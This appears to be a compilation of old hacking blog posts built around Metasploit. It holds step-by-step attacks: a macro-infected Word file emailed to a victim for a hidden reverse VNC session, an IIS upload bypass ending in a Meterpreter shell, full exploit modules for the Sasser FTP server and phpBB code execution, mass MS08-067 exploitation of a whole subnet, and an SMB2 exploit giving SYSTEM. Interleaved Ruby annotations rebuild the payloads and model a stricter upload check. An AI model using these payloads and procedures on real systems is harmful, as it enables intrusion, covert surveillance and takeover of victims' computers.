Today I will show you how to use Metasploit's VNC-inject payload to get a reverse VNC connection from a Word file: when the target opens the document, we get the VNC desktop of the remote user.
Metasploit generates a VBA macro for Word. Once the macro is in the document and the user opens it and allows macros to run, the payload injects a VNC server into the target process and connects back to us with the target's desktop. In my testing antivirus did not detect it, although that is worth re-checking against current signatures before relying on it.
No VNC software needs to be installed on the victim PC; the payload carries its own VNC server DLL.
This also works across the WAN; the only extra step is forwarding port 4444 (the default LPORT of the reverse_tcp payload used below) on your modem or router to the Metasploit host.
Lets begin
1) Create the macro to integrate with Word (the V output format makes msfpayload emit VBA source):
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas
2) Copy punter.bas to the Windows machine, then open Office 2003 -> Tools -> Macro -> Visual Basic Editor,
go to File -> Import File, choose punter.bas and save the document under a name such as macrogame.doc.
Now send this file to the victim by e-mail or some other technique; for this demo I will open it on my own system.
3) On BackTrack start the handler:
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E
DisableCourtesyShell=True stops the payload from opening a command prompt on the target's desktop, which would otherwise be visible to the user.
When the target opens the file on Windows, Word asks whether to enable the macro. If the user accepts, the macro runs, the connection comes back to the handler, and the VNC viewer opens on the BackTrack host.
Video link for the above guide
http://blip.tv/file/1847504
http://wirelesspunter.blip.tv
Tuesday, January 5, 2010
Monday, January 4, 2010
Exploiting Microsoft IIS with Metasploit
First we generate an ASP script that does a Meterpreter connect-back to the system running Metasploit:
$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp
Now we need to configure msfconsole to accept the incoming connection:
$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j
To avoid the image content validator, we will prepend a valid JPG image to our ASP script:
$ cat happy.jpg evil.asp > "evil.asp;.jpg"
$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02
Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"
Finally, we browse to the URL of the uploaded file. IIS 6 selects the script handler from the part of the path before the semicolon, so "evil.asp;.jpg" is run as ASP; the payload executes and creates a new session in msfconsole:
[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2668 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
nt authority\network service
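The two checks the post's upload handler performs, the IIS 6 path-mapping rule that turns the accepted file into executable ASP, and a stricter check side by side, as an added Ruby model. This is example code, not code from the original post, from the target application or from Metasploit; the function names, the constructed sample upload and the simplified IIS 6 model (handler chosen from the path before the first `;`) are assumptions of the example.

```ruby
# Added example: model of the upload check the post bypasses, the IIS 6
# handler selection that makes the bypass matter, and a stricter check.
# All names here are constructed for illustration, not the web app's code.

JPEG_MAGIC = "\xFF\xD8\xFF".b

# The check described in the post: extension ends in "jpg" and the bytes
# look like a JPEG. A real JPEG with ASP appended satisfies both.
def weak_upload_ok?(filename, content)
  filename.downcase.end_with?("jpg") && content.b.start_with?(JPEG_MAGIC)
end

# IIS 6 picks the script handler from the path before the first ';'
# (simplified model of that behaviour; an assumption of this example).
def iis6_handler_for(path)
  ext = File.extname(path.split(";", 2).first).downcase
  { ".asp" => :asp, ".aspx" => :aspx }.fetch(ext, :static)
end

# Stricter check: allowlist the whole basename (one image extension, no ';'
# or other separators), keep the magic-byte check, and let the caller store
# the file under a server-generated name outside any script-enabled directory.
SAFE_IMAGE_NAME = /\A[A-Za-z0-9_-]{1,64}\.(?:jpe?g|png|gif)\z/

def strict_upload_ok?(filename, content)
  filename.match?(SAFE_IMAGE_NAME) && content.b.start_with?(JPEG_MAGIC)
end

# Constructed sample standing in for "cat happy.jpg evil.asp":
# a JFIF header followed by an ASP tag.
EVIL_UPLOAD = JPEG_MAGIC + "\xE0\x00\x10JFIF\x00".b + '<% Response.Write("pwned") %>'.b

if __FILE__ == $0
  name = "evil.asp;.jpg"
  puts "weak check:   #{weak_upload_ok?(name, EVIL_UPLOAD)}"                 # true
  puts "IIS 6 handler: #{iis6_handler_for("/images/#{name}")}"               # asp
  puts "strict check: #{strict_upload_ok?(name, EVIL_UPLOAD)}"               # false
end
```

The magic-byte check is still necessary (it keeps out arbitrary files), but it is not sufficient on its own: the name and the storage location decide whether the server will ever hand the bytes to a script engine.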
Metasploit Blog
Metasploit? What is it?
What is it?
The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
What does it do?
The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.
Metasploit 3.3 Released
Version 3.3.3 of the Metasploit Framework has been released, featuring exploit safety rankings, a smaller EXE template, the addition of the InitialAutoRunScript option for Meterpreter, and the ability to run a script or command on all open sessions (sessions -c/-s). The complete release notes are online and version 3.3.3 can be obtained from the download page.
The Metasploit Framework
The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task. Metasploit is written in the Ruby scripting language and is provided under the BSD license. More information about the framework can be found on the Framework site.
The latest downloads for the Metasploit Framework can be found on the Downloads page.
The development source of the Metasploit Framework can be retrieved from Subversion with the following command:
$ svn co https://www.metasploit.com/svn/framework3/trunk/
Please see the Installation and Updating pages for help installing the framework.
New users may be interested in the Feature Guide
The Wiki index may be a good starting point
Hacking Malware [Video Tut]
http://good.net/dl/bd/defcon-14-video/Defcon14-V12-Valsmith_and_Quist-Hacking_Malware.mp4/info
HD Video
"Hacking Malware"
Sasser FTPd - Remote exploit for the Sasser worm's avserve FTP server
By Attack Research
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::sasser_ftpd;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
    'Name'     => 'sasser worm avserve FTP server Overflow',
    'Version'  => '$Revision: 1 $',
    'Authors'  =>
      [
        'valsmith [at] metasploit.net',
        'chamuco [at] gmail.com',
      ],
    'Arch'     => [ 'x86' ],
    'OS'       => [ 'win32', 'winxp' ],
    'Priv'     => 0,
    'AutoOpts' => { 'EXITFUNC' => 'thread' },
    'UserOpts' =>
      {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 21],
        'SSL'   => [0, 'BOOL', 'Use SSL'],
        'USER'  => [1, 'DATA', 'Username', 'ftp'],
        'PASS'  => [1, 'DATA', 'Password', 'ftp'],
      },
    'Payload'  =>
      {
        'Space'    => 480,
        # Bytes the encoder must keep out of the payload (NUL, FTP/URL
        # separators, whitespace, quotes, dots and slashes).
        'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
        'Prepend'  => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
        'Keys'     => ['+ws2ord'],
      },
    'Description' => Pex::Text::Freeform(qq{
        Windows sasser worm avserve ftp server exploit.
    }),
    'Refs' =>
      [
        ['OSVDB', '6197']
      ],
    'DefaultTarget' => 0,
    'Targets' =>
      [
        # [ name, return address ]
        ['Windows XP SP1', 0x77e7633a ],
      ],
    'Keys' => ['ftp'],
    'DisclosureDate' => 'not applicable',
};

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Check {
    my ($self) = @_;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');

    my $s = Msf::Socket::Tcp->new
      (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
      );
    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return $self->CheckCode('Connect');
    }

    # Fingerprint on the version string the banner is expected to carry
    my $res = $s->Recv(-1, 20);
    $s->Close();

    if ($res !~ /5\.0\.3/) {
        $self->PrintLine("[*] This server does not appear to be vulnerable.");
        return $self->CheckCode('Safe');
    }

    $self->PrintLine("[*] Vulnerable installation detected.");
    return $self->CheckCode('Detected');
}

sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target      = $self->Targets->[$target_idx];

    if (! $self->InitNops(128)) {
        $self->PrintLine("[*] Failed to initialize the NOP module.");
        return;
    }

    # DOS request version
    # my $request = "PORT" . "\x41"x500;

    # Buffer layout: 268-byte NOP sled, a short jmp (+6) over the return
    # address, the target's return address packed little-endian, a 5-byte
    # jmp rel32 of -1005, 15 bytes of padding, the encoded payload and
    # 1530 bytes of trailing padding. The original concatenated $target
    # itself (the target array ref); the address is element 1.
    my $request =
        "PORT" . "\x90"x268 . "\xeb\x06\x90\x90" . pack('V', $target->[1]) .
        "\xe9".pack('V',-1005) . "\x90"x15 . $shellcode . "\x90"x1530;

    my $s = Msf::Socket::Tcp->new
      (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
      );
    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    my $r = $s->RecvLineMulti(20);
    if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
    $self->Print($r);

    $s->Send("USER ".$self->GetVar('USER')."\n");
    $r = $s->RecvLineMulti(10);
    if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
    $self->Print($r);

    $s->Send("PASS ".$self->GetVar('PASS')."\n");
    $r = $s->RecvLineMulti(10);
    if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
    $self->Print($r);

    # The overlong PORT argument triggers the overflow
    $s->Send("$request\n");
    $r = $s->RecvLineMulti(10);
    if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
    $self->Print($r);

    sleep(2);
    return;
}

1;
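The PORT buffer the module concatenates, rebuilt piece by piece so the offset of each element is visible, plus a scan of the bytes against the module's own BadChars list. This is an added Ruby example, not part of the module or of Metasploit; the function names and the constructed stand-in payload (`\xcc` bytes) are this example's assumptions. The point of the scan is a check the framework does not make for you: the encoder applies BadChars to the payload only, while hand-authored fixed bytes such as the return address are never checked. Here the scan reports 0x3a inside the XP SP1 return address; whether that byte actually breaks the request depends on how avserve parses the PORT line, which is something to verify in a lab rather than assume.

```ruby
# Added example: rebuild the PORT request as the module's Exploit() does,
# record where each piece lands, and scan bytes against the module's
# BadChars list. Names are this example's own, not Metasploit's.

BADCHARS   = "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e".b.bytes
RET_XP_SP1 = 0x77e7633a          # 'Windows XP SP1' target from the module

# Returns [buffer, offsets]; offsets maps each element to its byte index.
def build_port_request(shellcode, ret = RET_XP_SP1)
  buf = "PORT".b
  off = {}
  off[:sled]      = buf.bytesize; buf << "\x90".b * 268
  off[:short_jmp] = buf.bytesize; buf << "\xeb\x06\x90\x90".b          # jmp short +6
  off[:ret]       = buf.bytesize; buf << [ret].pack("V")              # little-endian address
  off[:back_jmp]  = buf.bytesize; buf << "\xe9".b + [-1005].pack("V") # jmp rel32 -1005
  off[:pad]       = buf.bytesize; buf << "\x90".b * 15
  off[:shellcode] = buf.bytesize; buf << shellcode.b
  off[:tail]      = buf.bytesize; buf << "\x90".b * 1530
  [buf, off]
end

# [[byte, index], ...] for every byte that appears in the bad-char list.
def bad_bytes(data, badchars = BADCHARS)
  data.b.bytes.each_with_index.select { |b, _| badchars.include?(b) }
end

if __FILE__ == $0
  buf, off = build_port_request("\xcc".b * 4)   # constructed stand-in payload
  off.each { |k, v| puts "#{k.to_s.ljust(10)} @ #{v}" }
  puts "total #{buf.bytesize} bytes"
  bad_bytes(buf).each { |b, i| printf("bad byte 0x%02x at offset %d\n", b, i) }
end
```

Run it with a real encoded payload in place of the `\xcc` filler to confirm the encoder's output is clean; the return address hit it reports is the one the module's Payload block cannot see.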
phpBB Highlight - Remote exploit for phpBB
By Attack Research
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::phpbb_highlight;
use base "Msf::Exploit";
use Pex::Text;
use strict;

my $advanced = { };

my $info =
{
    'Name'    => 'phpBB viewtopic.php Arbitrary Code Execution',
    'Version' => '$Revision: 1.1 $',
    'Authors' =>
      [
        'valsmith [at] attackresearch.com',
        'H D Moore',
      ],
    'Arch' => [ ],
    'OS'   => [ ],
    'Priv' => 0,
    'UserOpts' =>
      {
        'RHOST'      => [1, 'ADDR', 'The target address'],
        'RPORT'      => [1, 'PORT', 'The target port', 80],
        'VHOST'      => [0, 'DATA', 'The virtual host name of the server'],
        'PHPBB_ROOT' => [1, 'URL',  'The phpBB root Directory', '/phpbb'],
        'SSL'        => [0, 'BOOL', 'Use SSL'],
      },
    'Payload' =>
      {
        'Space' => 1024,
        'Keys'  => ['cmd', 'cmd_bash'],
      },
    'Description' => Pex::Text::Freeform(qq{
        This module exploits two arbitrary PHP code execution flaws in the
        phpBB forum system. The problem is that the 'highlight' parameter
        in the 'viewtopic.php' script is not verified properly and will
        allow an attacker to inject arbitrary code via preg_replace().
    }),
    'Refs' =>
      [
        ['OSVDB', 11719],
        ['OSVDB', 17613],
      ],
    'DefaultTarget' => 0,
    'Targets' =>
      [
        ['Autotarget',    0],
        ['phpbb <2.0.11', 1],
        ['phpbb <2.0.15', 2],
      ],
    'Keys' => ['phpBB'],
};

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $vhost       = $self->GetVar('VHOST') || $target_host;
    my $cmd         = $self->GetVar('EncodedPayload')->RawPayload;
    my $target_idx  = $self->GetVar('TARGET');
    my $phpbb_root  = $self->GetVar('PHPBB_ROOT');
    my $target      = $self->Targets->[$target_idx];
    my $url;
    my $byte;

    # Add an echo on each end for easy output capturing
    $cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";

    # Autotarget: probe with phpinfo() in the double-encoded form. If its
    # output comes back, the < 2.0.11 variant is present; otherwise fall
    # back to the single-encoded < 2.0.15 variant.
    if ($target_idx == 0) {
        $url = $phpbb_root."/viewtopic.php?t=1&highlight=";
        $url .= "%2527"."%252e"."phpinfo()". "%252e"."%2527";

        my $request =
            "GET $url HTTP/1.1\r\n".
            "Host: $vhost:$target_port\r\n".
            "Connection: Close\r\n".
            "\r\n";

        $self->PrintLine("[*] Sending the malicious GET request...");
        my $s = Msf::Socket::Tcp->new
          (
            'PeerAddr' => $target_host,
            'PeerPort' => $target_port,
            'SSL'      => $self->GetVar('SSL'),
          );
        if ($s->IsError) {
            $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
            return;
        }

        $s->Send($request);
        my $results = $s->Recv(-1, 20);
        $s->Close();

        # The original pattern was /\phpinfo/; Perl reads "\p" as a Unicode
        # property escape, so match the literal string instead.
        if ($results =~ /phpinfo/) {
            $target_idx = 1;
        }
        else { $target_idx = 2; }
    }

    # Encode the command as a set of chr() function calls so no quotes,
    # spaces or other filtered characters appear in the parameter.
    if ($target_idx == 1) {
        # Double-encoded quote and dot (%2527, %252e)
        $byte = join('%252e', map { 'chr('.$_.')' } unpack('C*', $cmd));
        $url  = $phpbb_root."/viewtopic.php?t=1&highlight=";
        $url .= "%2527"."%252e"."passthru($byte)". "%252e"."%2527";
    }
    if ($target_idx == 2) {
        # Single-encoded quote, literal dots
        $byte = join('.', map { 'chr('.$_.')' } unpack('C*', $cmd));
        $url  = $phpbb_root."/viewtopic.php?t=1&highlight=";
        $url .= "%27."."passthru($byte)".".%27";
    }

    my $request =
        "GET $url HTTP/1.1\r\n".
        "Host: $vhost:$target_port\r\n".
        "Connection: Close\r\n".
        "\r\n";

    $self->PrintLine("[*] Sending the malicious GET request...");
    my $s = Msf::Socket::Tcp->new
      (
        'PeerAddr' => $target_host,
        'PeerPort' => $target_port,
        'SSL'      => $self->GetVar('SSL'),
      );
    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    $s->Send($request);
    my $results = $s->Recv(-1, 20);
    $s->Close();

    # Pull the command output out from between the echo markers
    if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
        my $out = $1;
        $out =~ s/^\s+|\s+$//gs;
        if ($out) {
            $self->PrintLine('----------------------------------------');
            $self->PrintLine('');
            $self->PrintLine($out);
            $self->PrintLine('');
            $self->PrintLine('----------------------------------------');
        }
    }

    return;
}

1;
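The highlight parameter as the module builds it for each target, what the PHP side sees after URL decoding, and the marker-based output extraction, as an added Ruby example (not the module's code and not part of Metasploit). The function names are this example's own; the number of decodes per target (two for the `< 2.0.11` form, one for the `< 2.0.15` form) is inferred from the module's choice of double versus single encoding, and the response body is constructed.

```ruby
require "uri"

# Added example: the module's highlight encoding for both targets, the
# decoded view the server ends up with, and the output extraction.
# Names and the sample response are this example's own.

# One chr() call per byte, joined with the given separator, as the module does.
def chr_chain(cmd, sep)
  cmd.bytes.map { |b| "chr(#{b})" }.join(sep)
end

# The echo markers the module wraps around the command.
def wrap_cmd(cmd)
  "echo _cmd_beg_;#{cmd};echo _cmd_end_"
end

def highlight_param(cmd, target)
  case target
  when :lt_2_0_11  # double-encoded quote and dot (%2527, %252e)
    "%2527%252e" + "passthru(#{chr_chain(cmd, '%252e')})" + "%252e%2527"
  when :lt_2_0_15  # single-encoded quote, literal dots
    "%27." + "passthru(#{chr_chain(cmd, '.')})" + ".%27"
  else
    raise ArgumentError, "unknown target #{target}"
  end
end

# Apply URL decoding n times: once for the web server, and once more where
# the vulnerable phpBB version decodes the parameter again itself
# (assumption of this example, drawn from the module's encoding choice).
def server_side_view(param, decodes)
  decodes.times.reduce(param) { |s, _| URI.decode_www_form_component(s) }
end

# The module's extraction regex applied to the response body.
def extract_output(body)
  m = body.match(/_cmd_beg_(.*)_cmd_end_/m)
  m && m[1].strip
end

if __FILE__ == $0
  p1 = highlight_param("id", :lt_2_0_11)
  puts "sent:            #{p1}"
  puts "after 1 decode:  #{server_side_view(p1, 1)}"
  puts "after 2 decodes: #{server_side_view(p1, 2)}"
  puts "with markers:    #{server_side_view(highlight_param(wrap_cmd('id'), :lt_2_0_15), 1)}"
  puts extract_output("<html>_cmd_beg_\nuid=33(www-data)\n_cmd_end_</html>")  # constructed body
end
```

The second decode is the whole trick for the older target: the quote that closes the string and the dots that concatenate the `passthru()` call are invisible to anything inspecting the parameter before phpBB decodes it a second time.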
Netcat-like Console Command: Connect
A few weeks ago I committed the initial version of a new console command used to communicate with a host: connect. Since then I've slowly added a few more features.
If you've ever used Netcat (all of you I'm sure), you'll feel right at home. If not, connect is quite simple to use and you should pick up on it quickly given the text below.
msf > connect -h
Usage: connect [options]
Communicate with a host, similar to interacting via netcat.
OPTIONS:
-C Try to use CRLF for EOL sequence.
-S Specify source address.
-c Specify which Comm to use.
-i Send the contents of a file.
-p List of proxies to use.
-s Connect with SSL.
-w Specify connect timeout.
As you can see, connect has many options to choose from. One very cool one is the -c option which allows you to, for example, route through a Meterpreter session. I show this below.
I've blocked HTTP access for this computer at the router:
msf > connect metasploit.com 80
[-] Unable to connect: The connection timed out (metasploit.com:80).
But let's see if we can re-route this through another computer and get it working anyway:
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.10.3:44692 -> 192.168.10.7:4444
msf > connect -c 1 metasploit.com 80
[*] Connected to metasploit.com:80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Sun, 18 Jan 2009 15:01:22 GMT
[...]
Booyah.
Of course that was just one contrived example, but having a built-in netcat-like command should open up some doors for fun and profit.
Enjoy!
Kris Katterjohn
Metasploit Blog
Metasploit Mass Exploitation for Dummies
One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time.
In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.
To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.
msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:
msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:
msf > db_autopwn -e -p -b -m ms08_067
Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Enjoy!
Metasploit Blog
Sunday, January 3, 2010
Saturday, January 2, 2010
Hack Windows Vista with Metasploit
First, scan the subnet for hosts that speak SMB2:
msf> use auxiliary/scanner/smb/smb2
msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24
msf (auxiliary/smb2) > set THREADS 100
msf (auxiliary/smb2) > run
[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours
[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours
When using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMWare.
Now that we have identified two systems with SMB2 enabled, it's exploit time!
msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit
[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)...
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)
meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
Language: en_US
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Voila! A great way to justify disabling SMB2 across your network.
Next item of interest -- we are now generating hourly builds of the 3.3-dev tree and making these available for download from the Metasploit web site. These come in two flavors and two sizes. We are offering the 3.3-dev package for Unix systems in both Full and Mini versions. The Mini version removes the SVN directories, many of the development source files, and the msfweb/msfgui interfaces.
For the first time, we are offering 3.3-dev packages for Windows (based on Cygwin 1.7 [HEAD]), also in Full and Mini versions. The Windows installer is lightweight and can be installed alongside an existing version of Metasploit. The Windows version can be installed to a USB key and made portable, just by specifying the proper path during the install. Finally, the Windows installer can be made to run in batch mode with a command line like the following:
C:\> framework-3.3-dev-mini.exe /S /D=C:\metasploit33dev
We would like to make sure everyone is aware of the freely-available Metasploit Unleashed Online Course developed by the Offensive Security team. The Metasploit Project is currently working with the team to expand the breadth and depth of this online course, with help from our own official Metasploit courseware. This course should continue to improve at rapid rate over the next few months.
Metasploit Blog